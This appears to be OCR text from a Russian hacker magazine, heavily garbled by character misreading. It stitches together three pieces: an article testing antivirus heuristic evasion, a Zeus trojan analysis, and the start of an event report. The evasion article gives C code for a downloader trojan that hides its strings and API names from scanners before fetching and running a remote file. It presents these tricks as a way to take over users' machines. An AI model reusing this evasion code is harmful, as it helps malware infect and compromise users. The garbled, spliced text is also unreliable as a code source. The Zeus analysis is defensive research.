труда. Правда, сіееопіз’а это не остановило — увидев большое 
количество положительных результатов со стороны этого авера, 
он не постеснялся написать еще один тест, пробивающий его 
нехитрую эвристику с эффективностью огнемета, пробивающе- 
го стену из паутины. 

Разумеется, эта статья не претендует на объективный и беспри- 
страстный анализ эвристики представленныхантивирусах. Мы 
никогда не стремились к так называемой «объективности» — 
мы просто хотим показать тебе, что опытный программист всег- 
да сможет поработить компьютер ламера ушастого независимо 
оттого, какие сторожевые программы на нем установлены. 



II... 

ііог (зІ 2 е_Ь і = 0; і <= 2000000; і + +) 

{ 

// рассчитываем ключ на основе количества выпол- 
ненных итераций 

іпЦ кеу = ( і%5 ) - ( і%5 ) +5; 
йесгурЦ ( згіігі , кеу ) ; 
сіесгурк ( згТешрЫаше , кеу ) ; 

} 

// загрузка и запуск файла 

// . . . 

Каквидно, ключ для декрипта нужных параметров у нас всетакже 
вшит в тело программы (правда, вычисляется немного хитро), но 
аверы уже должны постараться, чтобы добраться до сути кода, так 
какэвристике будеточень сложно осилить два миллиона итераций 



© Почему победил МсАіее? 

Хорошие результаты МсА^ее связаны с тем, что, помимо кода, 
его эвристический движоканализируетеще и секцию импорта 
ехе - файла. Увидев, что те сто выйви рус ра б ота ет все го с д ву м я 
АРІ-функциями, которые очень часто используются в совре- 
менныхтроянцах, МсА^ее поднимал тревогу. Причем анализ 
передаваемых параметров не проводился, антивирусу было 
абсолютно все равно, что и откуда скачивает программа. Подход 
довольно грубый, но достаточно эффективный. 

Но, к сожалению, такая стратегия детектирования неизвест- 
ных зловредов тоже не л пшена недостатков. Кактолько имена 
«плохих» АРІ исчезли из импорта, МсА^ее стал бесполезным. 
Более того, в восьмом тесте для расшифровки имен функций 
используется трюк с СгеаІеРіІе и файлом пНсіг, но стаким же 
успехом для декрипта можно применитьлюбую другую технику 
обхода эвристики. 
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Аѵіга пытается задетектить зловреда 

шифровки/расшифровки. Натравив КІБ201 1 на нашего троя, мы в 
ответ не получили ничего. Каспер не распознал вредоносного кода в 
тестовом файле. N0032 облажался также, как и Казрегзку — по его 
мнению, программа безопасна. Похоже, большие циклы действи- 
тельно вводят эвристику в ступор. Но надо же еще узнать мнение 
двух оставшихся конкурсантов! АпІіѴіг в этот раз решил не менять 
своего мнения и обозвал приманку ТП/йоѵѵпІоасІег.Ѳеп. МсАІюе 
также сработал четко — пара миллионов итераций не помешали 
вывести строку Зизресі-О! 601 71 1 206 РВ9. Таким образом, второй 
тест разделил наши антивирусы на две группы: лузеры и «крутые 
антивири». МсАІюе и Авира пока неплохо справляются, осилив все 
два теста. 

Тест №3 

Предыдущее испытание может показаться не слишком практичным. 
И действительно, большое количество итераций цикла существен- 
но замедлит выполнение программы, что в конечным счете может 
оказаться неприемлемым. 

Для третьего теста мы взяли на вооружение другой подход. Во всех 
предыдущихтрюках по обходу эвристики ключ всегда был доступен 
для анализа — эвристик мог л ибо вычислить его значение, либо оно 
ему было известно сразу. Теперьже мы решили воспользоваться еще 
одной слабой стороной антивирусных анализаторов кода — игнори- 
рование результатов вызова системных АРІ. 

Большинство эвристических движков не смотрят в код системных 
функций ѴѴіп б оѵѵз, и, следовательно, не могут предсказатьзначение, 
возвращаемое той или иной АРІ. А между тем, мы можем сгенери- 
ровать ключ расшифровки на основе этих АРІ. Например, функция 
СоттапсНіпеТоАгдѵѴѴ анализирует командную строку и говорит, 
сколько в ней содержится параметров. При вызове зловреда можно 
передавать ему определенное количество этих параметров, которое 
впоследствии может быть использовано для расшифровки нужных 
значений. 

Используем СоттапсИ_іпеТоАгдѵѴѴдля расшифровки строк 

// зашифрованные строки 

И ... 

// ключом служет количество переданных параметров в ко- 
мандной строке 
іпЬ кеу; 

СошшапсіЬіпеТоАгдѵѴ/ ( ІрСтсІЬіпе , &кеу) ; 
сіесгурк ( згіігі , кеу) ; 
сіесгурк ( згТетрЫате , кеу ) ; 



// загрузка и запуск файла 

II... 

Значение переменной кеу мы получаем из вызова 
СоттапбипеТоАгдѵѴѴ. Естественно, никто, кроме нас, не знает, 
какое оно должно быть, и при сканировании файла антивирус не 
должен понять, что же там действительно происходит. На этот раз 
никто, кроме МсАІюе, не разгадал подозрительный код. Касперский, 
НОД и Апбѵігдаже не пискнули во время скана. МсАіюе вырывается в 
лидеры. Посмотрим, изменится ли сложившаяся ситуация в следую- 
щих испытаниях. 

Тест №4 

Генерация ключа на основе передаваемых параметров — не очень 
хорошая идея. Часто запустить зловред с командной строкой невоз- 
можно, поэтому мы придумали другой метод. Суть его заключается 
в следующем: с помощью функции СгеаІеРІІе мы пытаемся открыть 
файл пИсіг, который лежит в корне системного диска. Если открывать 
этот файл только на чтение, мы получим заранее известный резуль- 
тат, который точно не будет равен ІМѴАиВ_НАМВІ_Е_ѴАШЕ. Зная 
это, можно реализовать следующий трюк: 

Используем СгеаІеРіІе 

// зашифрованные строки 

// ... 

НАШЗЬЕ Ь = СгеаЕеЕіІеА ( " с : \\пЕ1с1г " , 

РІЬЕ_КЕАБ_АССЕЗЗ, 0, 0, ОРЕЫ_ЕХІЗТШС , 0, ШЬЬ) ; 

// расшифровка в теле іі: 

І1 (к ! = ІЕѴАЫБ_НАЕБЕЕ_ѴАЫІЕ) 

{ 

іпк кеу = 5; 
сіесгурк (згіігі , кеу) ; 
сіесгурк ( згТетрЫате , кеу ) ; 

} 

// загрузка и запуск файла 

II... 

Как видно из кода, мы сравниваем результат, который возвратила 
функция, с ІІ\ІѴАІ_ІВ_НАІ\ІВІ_Е_ѴАШЕ, и затем, будучи точно уве- 
ренными в этом сравнении, выполняем расшифровку нужных нам 
переменных. 

Теперь нажмем кнопку Зсап у наших антивирусов и посмотрим на ре- 
зультаты. КІ5 скромно промолчал. Его примеру последовали N0032 
и Аѵіга АпІіѴіг. А вот МсАІюе опять начал ругаться на тестовый вирус, 
определив его как5изрес1;-В!73АВ7ЕВ9А4Е5. Таким образом МсАІюе 
закрепил свое лидерство и оставил соперников позади. 

Тест №5 

Пятый тестосновывается на вызове двух АРІ -функций ѴѴіпбоѵѵз: 
СгеаІеЕіІе и ОеНазіЕггог. Суть его заключается в том, что с помощью 
СгеаІеЕіІе мы пытаемся открыть файл, которого не существует на 
диске, например, что-нибудьтипа д Ь] 1 21кі : сІ0і : іѵпсІ5І835.с]8. После 
неудачной попытки открытия файла функция ОеНазіЕггог вернет 
ошибку ЕРР0Р_ЕІІ_Е_І\І0Т_Е01ІІ\ІВ. На основе этого значения мы 
будем генерировать ключ для расшифровки строк. 

Генерация ключа на основе результата ѲеІЬазІЕггог 

// зашифрованные строки 

// ... 

// генерация ключа на основе СекЕазЕЕггог 
НАТГОЬЕ Ь = СгеаЕеЕіІе ( 

_Т ( "с : \\з<ікз] к9і3 4иккѵпшкіеги83 4дкЬкег . хіз " ) , 
ЕІЕЕ_КЕАБ_АССЕЗЗ, 0, 0, ОРЕЫ_ЕХІЗТШС , 0, ШЬЬ) ; 

БѴГОКБ кеу = СекЬазкЕггог ( ) ; 
кеу +=3 ; 

сіесгурк (згіігі , кеу ) ; 
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ЛЛАШАВЕ 




редственно осуществляться вызов функций ІіРЮоѵѵпІоасІТоРіІе 
и ЭбеІІЕхесиІе. Ниже приведен код этого маневра: 

Многопоточность 

/ / зашифрованные строки 

ТСНАЕ 32ІТг1[] = _Т ( "шрри?**з1ѵлпп ѵд+ітЬ*д1к*ісі1к:Ет+ ' } ' " ) ; 
ТСНАЕ згТетрЫаше [ ] = _Т ( "Е?Уі(І1кіт+ 

ѵоісі Ылгі ( ) 

{ 

Зіеер (0) ; 



Домашний экран Аѵіга АпІіѴіг РегзопаІ 

сіесгурр ( згТетрЫаше , кеу ) ; 

// загрузка и запуск файла 

// ... 

Стоит отметить, что этот способ достаточно популярен, и 
(ЗеНавіЕггог можно использовать в связке не только с СгеаІеЕІІе, 
но и любой другой АРІ, которая вызываетзаранее известную 
о ш и б ку. 

Теперь проверим сообразительность а веро в. Честно говоря, мы 
уже думали, что картина вряд ли изменится — аутсайдеры не смо- 
гут набрать больше очков, но мы ошиблись. Казрегзку неожиданно 
для нас показал окно, в котором радостно сообщалось о возмож- 
ной опасности. Обозвал он эту опасность, как и прежде, Неиг. 
Ооѵѵпіоасіег. Следующим был N0032. Он оказался не настолько 
удачливым и промолчал. Также себя повел и АнтиВир, а вот 
МсАІюе опять гордо заявил о трояне. 

Тест №6 

Следующее испытание завязано на многопоточности. Мы разбили 
код тестового зло вреда на два блока. Первый блок расшифровы- 
вает строки заранее заданным ключом. Этот код выполняется в 
отдельном треде. В основном же потоке программы будет непос- 



Сравнительная таблица результатов 



Кажется, что МсАІее празднует победу, но мы все-таки подпортим 
ему веселье. Выигрыш американского антивируса оченьусловен. 
Во-первых, прочность цепи определяется самым слабым еезвеном, и 
у МсАІееэтозвено — тест №8. Аво-вторых — читай врезку. Наэтом мы 
заканчиваем наши исследования. Всегда нужно помнить, что наличие 
крутого антивируса неспасеттебя от крутого вируса. Самая надежная 
защита — это собственная голова. 
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іпС кеу = 5; 
сіесгурк ( 3 2 ІІГІ , кеу) ; 
сіесгурк ( згТешрЦагпе , кеу) ; 

} 

Іпс АРІЕИТЕУ _ШіпМаіп (НШЗТАИСЕ Ыпзкапсе, 

НШЗТІШСЕ ЬРгеѵІпзкапсе, 

ЬРТЗТЕ ІрСтсІЕіпе, 
іпі пСтсіЗІючлЦ 

{ 

ШОЕО р; 

НАШЭЬЕ Ц1=СгеакеТЪ.геас1 (0,0, 

ЬРТНЕЕАБ_ЗТАЕТ_ЕОНТШЕ) &Щіг1 ,0,0, &р ) ; 

Зіеер (3000) ; 

// загрузка и запуск файла 

И ... 

} 

Как видно, для синхронизации действий мы использовали Зіеер. Это 
не слишком изящно, зато работает. Практически со 1 00% вероятностью 
наши строки успеют расшифроваться до начала процесса загрузки 
файла из сети. 

Здесь результаты полностью совпали с предыдущими. Хоть мы и смени- 
ли тактику, начав использовать потоки, ни МсАІюе, ни КІ5201 1 не купи- 
лись на эти уловки и громко протрубили о своей находке. А вот НОД32 и 
Аѵіга опять сели в лужу. Теперь мы видим, что Каспер начал вырываться 
вперед, оставляя позади хорошо стартовавший АпІіѴіг. Но дальше наши 
антивирусы ожидаютеще целыхдва испытания. 

Тест N27 

Седьмой тест — это немного усложненная версия предыдущего. Здесь 
мытакже хотим с помощью многопоточности обманутьэвристик, но 
на этот раз используем более хитрый метод синхронизации потоков — 
механизм событий (еѵепі). 

Втелетреда, ответственного за декрипт строк, мы ожидаем установки в 
сигнальное состояние события с именем е_Неиг. В основном же потоке 
мы создаем этотивенти включаем его. Таким образом мы надеемся еще 
сильней запутать эвристику: 

Многопоточность и «продвинутая» синхронизация 

// зашифрованные строки 

ТСЕАЕ 32Шг1[] = _Т ( "тдди?**з1жгг) ѵд+1пк*д1к*ісі1к1т+ ' } ' " ) ; 
ТСНАЕ згТетрЫаше [ ] = _Т ( "Е?Уісі1к1т+ '}'"); 

ѵоісі Щігі ( ) 

{ 

НАШЬЕ еѵепк = ОрепЕѵепк ( 8УЖШКОШ 2Е ,ЕАЬЗЕ, 

_Т ( " е_Неиг " ) ) ; 

ШікЕогЗіпдІеОЬп еск (еѵепк , ШЕШІТЕ) ; 

іпс кеу = 5; 
сіесгурк ( згШгІ , кеу) ; 
сіесгурк ( згТетрНаше , кеу) ; 
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} 

іпЬ АРІЕЫТКУ _ШіпМаіп (НШЗТАШЕ МпзЬапсе, 

НШЗ'ТАШЕ ЬРгеѵІпзЬапсе, 

ЬРТЗТК ІрСшсаьіпе, 
іпЬ пСтсІЗЬсж) 

{ 

НАШЬЕ еѵепЬ = СгеаЬеЕѵепЬ (ШЬЬ , ТШЕ, ЕАЬЗЕ , 

_Т ( " е_Неиг " ) ) ; 

ШОКБ р ; 

НАШЬЕ Ы=СгеаЬеТЪ.геас1 (0,0, 

ЬРТНКЕАЬ_ЗТАКТ_К017ГШЕ ) &Ыіг1 , 0 , 0 , &р) ; 

Зіеер (2000) ; 

ЗеЬЕѵепЬ (еѵепЬ) ; 

Зіеер (2000) ; 

// загрузка и запуск файла 

// . . . 

} 

Усложнениетрюка с многопоточностью не принесло ожидаемых 
результатов. «Зачеты» и «незачеты» распределилисьточнотакже, как 
и втесте №6. Каспер и МсА'Гее впереди, а N0032 с Авирой, похоже, уже 
смирилисьсозванием неудачников. 

Тест №8 

Во всех предыдущих испытаниях мы криптовали строки, которые 
передаются АРІ-функциям в качестве аргументов. В последнем тесте мы 
решили поменять подход, поскольку некоторые антивирусы (в частнос- 
ти, МсАіее) очень хорошо распознают наши уловки. Теперь мы будем 
динамически получать адреса I) РЮоѵѵпІоасІТоРіІе и ЗЬеІАЕхесиІе, пред- 
варительнозашифровав ихимена.Для большей наглядности советуем 
посмотреть КОД: 




} 

// получаем адреса функций 

НМОЫІЬЕ ЬМойиІе = ЬоайЬіЪгагу (_Т ( "игітоп. сЗ.1 1 " ) ) ; 
ІШЬЕІШС игІРгос = (ШЬРШС) СеЬРгосАШгезз (ЬМосіиІе , 
згЬгІЬоѵтІоасІ) ; 

ЪМосіиІе = ЬоасІЬіЪгагу (_Т ( " зЬе1132 . сЗ.11 " ) ) ; 

ЕХЕСЕІЖС ехесРгос = (ЕХЕСЕШС) СеЬРгосАШгезз (ЬМосІиІе , 
згЗЬеІІЕхес) ; 



ШИФРОВАНИЕ ИМЕН КЛЮЧЕВЫХ АРІ 

Ьуресіеі НКЕЗЬЬТ ( зШсаІІ * ШЬРШС) СІЩЦЖШШ, ЬРСТЗТК, 

ЬРСТЗТК , ШОКЪ , ЬРВІШЗТАТЬЗСАЬЬВАСК ) ; 

Цуресіеі НШЗТАШЕ ( зШсаІІ *ЕХЕСРШС) (НШБ, ЬРСТЗТК, 

ЬРСТЗТК , ЬРСТЗТК , ЬРСТЗТК , ШТ ) ; 

іпР АРІЕЫТКУ _ШіпМаіп (НШЗТАШЕ МпзЬапсе, 

НШЗТАШЕ ЬРгеѵІпзЬапсе, 

ЬРТЗТК ІрСшсІЬіпе , 
іпЬ пСтйЗЬхж) 

{ 

ЬОШ гез; 

/ / зашифрованные строки 
ТСНАК згЬгІ [] = 

_Т ( п тддд?**з1жпзѵд+ЬзМд1кМШк:І:т+' } ' " ) ; 

ТСНАК згТетрЫате [ ] = _Т ( "Р?Уі(І1кЬт+ '}'"); 

/ / имена функций 
ТСНАК 3 2ЬгІЬоѵт1оас1 [ ] = 

М ( ,, РША:^^кі;^сIа^:^С1і'К ,, ) ; //_Т ( "ЦШБоѵтІоасІТоРіІеѴГ ) ; 
ТСНАК згЗЬеІІЕхес [ ] = 

_Т ( "Ѵш' і і@ } ' Ьрд'К" ) | / /_Т ( " ЗЬеІІЕхесиЬеМ" ) ; 

НАНБЬЕ Ь. = СгеаЬеРіІеА ( " е : \\пЫЫг " , 

ЕІЬЕ_КЕАБ_АССЕЗЗ, 0, 0, ОРЕЫ_ЕХІЗТІШ, 0, ШЬЬ); 

І1 (Ъ. != І]ШАЬІБ_НАЫБЬЕ_ѴАЬІІЕ ) 

{ 

іпЬ кеу = 5 ; 
сІесгурЬ ( з 2 ІЬг 1 , кеу ) ; 
сІесгурЬ ( згТетрЫате , кеу) ; 
сІесгурЬ (з2ШгІЬоѵт1оас1,кеу) ; 
сІесгурЬ (згЗЬеІІЕхес, кеу) ; 



// загрузка и запуск файла 

гез = (игІРгос) (ШЬЬ, згШгІ , згТетрЫате , ШЬЬ, ШЬЬ) ; 

І2 (гез==3_0К) 

{ 

(ехесРгос) (ШЬЬ ,_Т ( " ореп" ) , згТетрЫате, 

ШЬЬ, ШЬЬ, ЗШ_НІЬЕ) ; 

} 

} 

Мы используем трюк из четвертого теста (открытие файла пЦбгс 
помощью функции СгеаІеРіІе], но в теле оператора выбора помимо 
«стандартных» строк расшифровываем еще и имена АРІ, в частности, 
ЗЬеІІЕхесиІеѴѴ и ЦІ РЮоѵѵпІоасІТоРіІеѴѴ. После этого мы получаем адреса 
этих функций с помощью ОеіРгосАсІсІгезБ и обращаемся к ним по этим 
адресам. 

Сменатактики принесла свои плоды. Касперский своим молчанием 
позволил нашемутрою инфицировать всю систему — несправиласьего 
эвристика с расшифровкой имен функций. N0032 и Аѵіга АпНѴігтоже 
не нашли ничего подозрительного, кчему мы, впрочем, уже привыкли. 
Сюрприз насждал при запуске скана в МсАІюе. Не веря своим гла- 
зам, мы даже повторили процедуру несколько раз. Криптование имен 
вызываемых АРІ разнесло в пух и прахэвристику антивируса с пометкой 
«Мабе іп ІІ5А». 

На этом наши эксперименты закончены. Пора подвести итоги и сделать 
некоторые выводы, чем мы сейчас и займемся. 

Итоги 

Самая плохая эвристика оказаласьу словаков. Е5ЕТ І\І0032успешно 
справился лишь с одним тестом. Вторым с конца оказался Аѵіга АпбѴігс 
результатом 2 из 8. Касперский успешно разобрался с четырьмя испыта- 
ниями. Алидером стал МсАІюе, завалив лишь один тест, зс 
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о Наверное, каждый читатель ][ слышал о таком зловреде, как 2еи$. 
Этот бот появился еще в 2007 году и уже тогда наделал много шума. 
Со временем разработчик данного троя «отошел отдел», и его 
начинание продолжили другие группы киберпреступников. Данного 
зловреда отличает от других ботов очень высокое распространение 
в мире и богатый функционал по краже конфиденциальных данных 
пользователей. 



СЕГОДНЯ МЫ ПОДВЕРГНЕМ ДЕТАЛЬНОМУ 
РАЗБОРУ ОДНУ ИЗ ПОСЛЕДНИХ ( на момент 
сдачи статьи — конец сентября — прим. 



ред.) модификаций этого трояна, опре- 
деляемого ЛК как Тгоіап-8ру.ѴѴіп32.2ЬоІ. 
апу 2 . Разбор будет поделен на несколько 



этапов, каждый из которых будет подробно 
раскрывать одну из составных частей тро- 
яна: «внешний вид», «упаковка и защита», 



► 082 
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Рис 1. Просмотр ОаІаОігесГогу РЕ-хедера ТЬоѴа в Ніеѵѵ 
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Рис. 2. Попытка РезНаскег'а открыть ресурс типа 
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Рис. 3. Один из фэйковых вызовов в 2ЬоГе 



Рис. 4. Алгоритм расшифровки одного из участков кода 
2ЬоГа 



«полезная нагрузка». Под «внешним видом» подразумевается 
структура файла, особенности РЕ-заголовка, количество и располо- 
жение секций и т.д. 

Далее будут разобраны такие методы защиты от детектирования ан- 
тивирусами и разбора в отладчике, как антиэмуляция и обфускация. 
Завершится обзор основным функционалом ХЬоЕа: куда подклю- 
чается, что ворует, что перехватывает и т.д. В течение статьи будут 
описаны всетулзы, использованные при разборе. 

Ну-с, приступим 

Взглянув на файл из Ніеѵѵ, я сразу же увидел ІІРХ — об этом же 
говорила и точка входа, стандартная для этого пакера. Меня сильно 
удивила таблица экспортируемых функций, расположенная по РѴА 
— 0x1 000, хотя как раз по этому адресу располагается секция 11РХ0, 
у которой РЬузіса I Віге нулевой. Таким образом, примаппировании 
файла в память загрузчиком, начиная с ІтадеВазе + 0x1 000 и на 
протяжении ѴігІиаІЗіге секции 11РХ0, все будетзабито нулями. Сле- 
довательно, экспорты некорректны, и были добавлены разработчи- 
ками явно не для того, чтобы экспортировать функции. Также в файле 
присутствуют ресурсы. Я попробовал просмотреть их с помощью 
РезНаскег’а, однако он обнаружил только элементтипа «Оіаіод» и не 
смогего корректно обработать. Таким образом, помимо фэйковых эк- 
спортов файл содержитеще и фэйковые ресурсы. По-видимому, это 
было сделано для того, чтобы ХЬоІ больше походил на нормальные 
приложения. Все поля хедера прекрасно разбираются с помощью 
Ніеѵѵ, что и показано на рисунке 1 . 

Получив некоторую первичную информацию, я перешел к более де- 
тальномуанализу. Для начала мне было необходимо распаковать файл, 
чтобы можно было по-человечески воспользоваться отладчиком. Я 
использовал консольную версию пакера ІІРХ, которая прекрасно спра- 
вилась со своей задачей. В результате ее работы я получил полностью 
рабочий распакованный РЕ’шникс корректными импортами. 



На первый взгляд даже в распакованном файле практически невоз- 
можно было определить функционал — строки отсутствовали, боль- 
шинство блоков данных было закриптовано, а код, соответственно, 
сильно обфусцирован. Помолясь, я приступил котладке с помощью 
ЮА5.1 и декомпиляции при помощи Нехгауз. Обфускация выполнена 
довольно просто и очень легко вычислялась — она представляет 
собой множество вложенных САІ_І_’ов, содержащих логические/ 
арифметические операции над [ЕВР + хх]. Одна изтаких фэйковых 
конструкций показана на рисунке 3. 

Помимо обфускации с помощью машинных ко манд применяется 
еще и множественный вызов АРІ-функций, не несущих «полезной 
нагрузки» — так называемые ЕакеАРІ. Эта методика применяется 
для обхода эмуляторов, которые поддерживают работу только с 
определенными функциями или вовсе не поддерживаюттакие 
вызовы. В данном экземпляре встречается, например, такая 
экзотическая функция, как НіІіІеМепиІІепп, при этом в качестве 
параметров ей передаются сплошные нули, что, согласись, весьма 
подозрительно :). 

В результате получается, единственное, что делает весь исполняе- 
мый код — выделяетпамятьс помощью ѴігШаІАЕос’а, записывает 
туда один из зашифрованных блоков файла, расшифровывает и 
переходит на него. На рисунке 4 показан весь алгоритм декриптовки, 
найденный с помощью ЮА. Таким образом, код, расположенный под 
ІіРХ’ом, оказался для меня крайне неинтересным. 

Выковыриваем тело 

Перейдем котладке фрагмента кода, который располагается в 
выделенной с помощью функции ѴігІиаІАІІос памяти. Первое, с 
чем я столкнулся — антиэмуляция на основе чтения полей систем- 
ной структуры РЕВ (Ргосезз Епѵігоптепі Віоск). Зловред получает 
значение «РеабОпІуЭіаІісЭегѵегОаІа», которое, согласно книге 
«Іпігобисбоп Іо І\ІТ Іпіегпаіз» содержит: «ТЫз біеісі баз а роіпіег 
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10 а роіпіегіо а зузіет-ѵѵісіе збагесі тетогу Іосабоп (геасі-опіу). 

11 із и з и а I Іу етріу». На дележе, в реальной системе, в результате 
нескольких переходов по указателям я наткнулся на юникодную 
строку «С :\\Л/ІІ\Ю0ѴѴ5». Зловред берет одно из двойных слов этой 
строки и сравнивает со своим эталонным значением. В случае 
неудачи — завершается. Далее я встретил еще одну антиэмуляцию 
— вызов ЫШиегуЗузІютІпіюгітіабоп через прямой вызов сервиса 
ОхАй и дальнейшее сравнение одного из полей структуры 5Ѵ5ТЕМ_ 
РЕРРОМАІ\ІСЕ_ІІ\ІРОРМАТІОІ\І с эталонными значениями. В итоге 
все исполнение свелось кочередной дешифровке, в результате чего 
адресное пространство исходного процесса стало содержать полно- 
стью новый РЕ’шник. Для получения корректного дампа я пользовал- 
ся РЕТооІз и связкой ЕогсІРЕ + ІппрРес 1 .6 (РЕТооІз сама сразуже под- 
правляет дамп, но второй вариант более гибкий в использовании). 
Итак, передо мной оказался оригинальный бот^еиз, который, 
по-видимому, и распространяют разработчики. Все остальное, 

что описывалось до этого — просто оболочка, которая позволяет 
эффективно распространять целевой продукт. Оказалось, что сам 
Іеиз написан на С и скомпилирован при помощи Студии, файл 
обладает релоками, ИАТ’ом, импортами. В целом, вся структура до- 
вольно стандартна, осталось разобрать сам функционал. Для этого я 
использовал виртуальную машину ѴМѴѴаге совместно с отладчиком 
ЮА. На виртуальной системе присутствовали такие программы для 
мониторинга, как ЕіІеМоп, РедМоп, Ргосезз Ехріогег и дамп еры 
РЕТооІз и ЕогсІРЕ. Какяупоминал ранее, вдополнение кЮАбыл 
заюзан декомпилятор Нех-Рауз, который преобразует АБМ-код в С- 
код. Он значительно помог мне при разборе. К примеру, практичес- 
ки поточке входа начинается разбор командной строки (см. рис. 5). 
Таким образом выяснилось, что 2Ьоі проверяет четыре ключа: «~Ь>, 
«-і», «-п», «-ѵ». Оказалось, что ключ «-І» скорее всего расшифровы- 
вается ка к « I п бо г т а 1; і о п » , поскольку его использование заставляет 
программу показывать сведения о сборке бота в МеззадеВох’е 
(показано на рис. 6). Ключ «-п» отключаетудаление оригиналь- 
ного файла (по умолчанию Іеиз копирует себя в Ар ріісабі оп Оаіа 



Рис. 7. Пример работы утилиты 5ру++ с языковой 
панелью 

Помимо обфускации с помощью 
машинных команд, применяется 
еще и множественный вызов АРІ- 
функций, не несущих «полезной 
нагрузки» - так называемые 
ГакеАРІ 



ктекущему пользователю и удаляет себя). А ключ «-ѵ» переводит 
приложение в режим ожидания и ждет определенного сообщения с 
помощью ОеіМеззадеѴѴ. В общем, выяснилось, что эти ключи пред- 
назначены для разработчика или для распространителя, нежели 
для использования их на зараженной тачке. 

Даже если рассматриваемый файл уже ничем не упакован, он 
содержит несколько закриптованныхучастков исполняемого кода и 
зашифрованные строки. Напрягает что Зевс во время работы копи- 
руеттакие строчки в стек и уже там их декриптует. Следовательно, 
нельзя просто снять дамп и наслаждаться содержимым, а нужно 
под отладчиком отслеживать работу с определенными фрагментами 
памяти. Далее было выяснено, что Іеиз создает батник, который 
удаляет оригинальный файл; содержимое батника примерно следу- 
ющее (получено на виртуальной машине): 

©есію оіі 

: а. 

сіеі " с : ХгЪоЕ . ехе" 

ІТ ехізі " с : ХгЪоЕ . ехе" доіо сі 

сіеі /Р "С: \БОСШЕ~1\апЦопіе\ЬОСАЦЗ~1\Тетр\ 

1тр8с717853 .Ъаі" 

Конечно, основное назначение бота — подключаться к командно- 
му центру и получать оттуда команды, чтобы в дальнейшем делать 
то, что сказано, но я об этом расскажу в последнюю очередь. Для 
начала упомяну о нескольких интересных вещах, обнаруженных в 
процессе анализа строк. 

Іе из используеттакие функции из библиотеки саЬіпеСсІЦ, как 
РСІСгеаІе, РСІАсИРіІе, РСІРІизЬСаЬіпеІ и др. Они позволяют рабо- 
тать с саб-архивами, через которые можно передавать плагины 
и конфигурационные файлы для бота. Другая сторонняя либа — 
пзргАсШ. — представляетсобой «ТЬе ІМеізсаре РогіаЫе Рипііте 
(ІМ5РР)», позволяющий «аііоѵѵз сотрііапі арріісаііопз Іо изе зузіет 
!асіЩез зисб аз Ібгеасіз, ІбгеасІ зупсбгопігаііоп, 1/0, і пбегѵаі бітіпд, 
аіотіс орегаііопз, а псі зеѵегаі оібег Іоѵѵ-Іеѵеізегѵісез іп а рІаНогт- 
іпсіерепсіепі та п пег». Наш бот использует для обращения со своим 
сервером соответствующие функции из ІЧ5РР: РР_0репТСР5оскеІ, 
РР_С1озе, РР_РеасІ, РР_ѴѴгіІе и прочие. Для слежения за действи- 
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Рис. 8. Данные по обращениям к командному центру 2еи$'а ****са$е.сс 
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Рис. 6. Результат запуска 2ЬоТа с ключиком «-і» 
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Рис. 5. Пример работы Нех-Вауз на участке кода, 
проверяющего параметры командной строки 



ями пользователя 2еиз непрерывно ищетокна с классами #32768, 
СопзоІеѴѴіпсІоѵѵСІазз, СісегоШѴѴпсІРгате, МОІСІіепІ, 8узЫз1:Ѵіеѵѵ32. 
Чтобы узнать язык ввода, производится обращение кязыковой 
панели, которая отображается в нижнем правом углу и показывает 
раскладку клавиатуры через класс СісегоШѴѴпсІРгате. Для про- 
верки названий классов я использовал утилитку 5ру++ из набора 
Місгозоіі Ѵізиаі Зіисііо. 



Даже если рассматриваемый 
файл уже ничем не упакован, 
он содержит несколько 
закриптованных участков 
исполняемого кода 
и зашифрованные строки 



Теперь можно рассказать и о самом основном — работе бота с ко- 
мандным центром. Практически сразу после запуска 2еиз пытается 
подключиться ксерверу ****сазе.сс, который был закрыт уже во 
время разбора сэмпла.Темнеменее.поискавв интернете инфу по 
этому домену, мнеудалось получить достаточно много ценныхдан- 
ных. Сам домен располагается в Китае и часто меняет ІР-адреса. А 
на сайте сіеап-тх. бе удалось обнаружить статистику обращений по 
данному адресу (рис. 8). 

Как видно из табл и цы, 2еиз скачивает как конфигурационные фай- 
лы, так и других зловредов (это оказались более свежие конфиги 
того же Зевса, отличающиеся устройством антиэмуляции и произ- 
вольным мусором. Тем не менее, большим процентом антивирусов 
они не детектировались). 

Ксожалению, живые конфиги найти неудалось, поэтому нельзя 
сказать точно, для кражи чего использовались 2еиз’ы, подключаю- 
щиеся кэтому СС. 

Заключение 

На этом разбор нового 2еиз’а закончен. Оказалось, что под очень 
мощной защитой, которая довольно качественно устроена и сильно 
усложняет работу как исследователям, так и антивирусам, скры- 
вается довольно стандартный бэкдор. Он подключается ксерверу 
и ждет от него команд, при этом обладая возможностями, которые 
позволяюттщательно следить за пользовательской машиной и 
его личными данными. Высокая распространенность данного бота 
обусловлена, прежде всего, отличной технической поддержкой 
разработчиков, регулярно обновляющих свое детище. Не стоит 
забывать и о том, что распространение, как правило, организуется 
через «партнерки» и позволяет разработчикам не думать о том, как 
продукт попадет к пользователям. Отом, что 2еиз — не одиночный 
зловред, говорит и техническая инфа о сборке, которая выводится 
ключом «-і». т 
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СНАОЗ 

С0№ТШІ0№ 2010 

о Жизнь ІТ-сцены насыщена событиями - каждый день в разных 
уголках земного шара проходят различные конференции, выставки, 
форумы, презентации и так далее. Однако помимо этих важных и 
солидных мероприятий существуют и более неформальные (но не 
менее интересные) ивенты: всевозможные лан- и демопати, хакерские 
слеты и другие, отличные по названию, но сходные по содержанию 
собрания. Увы, лишь малый процент этих клевых мероприятий 
базируется в России, но такие есть! Ежегодный компьютерный 
фестиваль СНаоз Сопзігисііопз - яркий пример того, что русский 
андеграунд тоже умеет зажигать. 



Истоки 

Прошел год стех пор, какмы рассказывали 
тебе о СЬаоз Сопзігисііопз 2009, и мы решили 
не прерывать эту славную традицию, загля- 
нув на фестиваль и в этом, в некотором роде 
юбилейном для него, году. 

Дело в том, что история СС уходит корнями 
в далекий 1 995 - именнотогда на просторах 
постсоветского пространства зародилась 
едва ли не первая демопати ЕІ\ІІ_іОНТ, пра- 
родитель нынешнего СЬаоз Сопзігисііопз. 
ЕМиСНТ являл собой демопати в самом 
классическом понимании этого слова - все 
основное действо на фестивале крутилось 
вокругдемосцены.то есть самих работ и 
персон демомейкеров. Какие сложно дога- 
даться, в те годы ивент, мягко выражаясь, не 
был массовым и собирал, по самым смелым 
подсчетам, сотню-другую человек. 
Массовость мероприятия росла прямо 
пропорциональнотому, как быстро у народа 
возрастал интерес к компам, консолям, 
программируемым калькуляторам и прочим 
железкам. Чем больше появлялосьэнтузиас- 
тов, интересующихся таким нетривиальным 
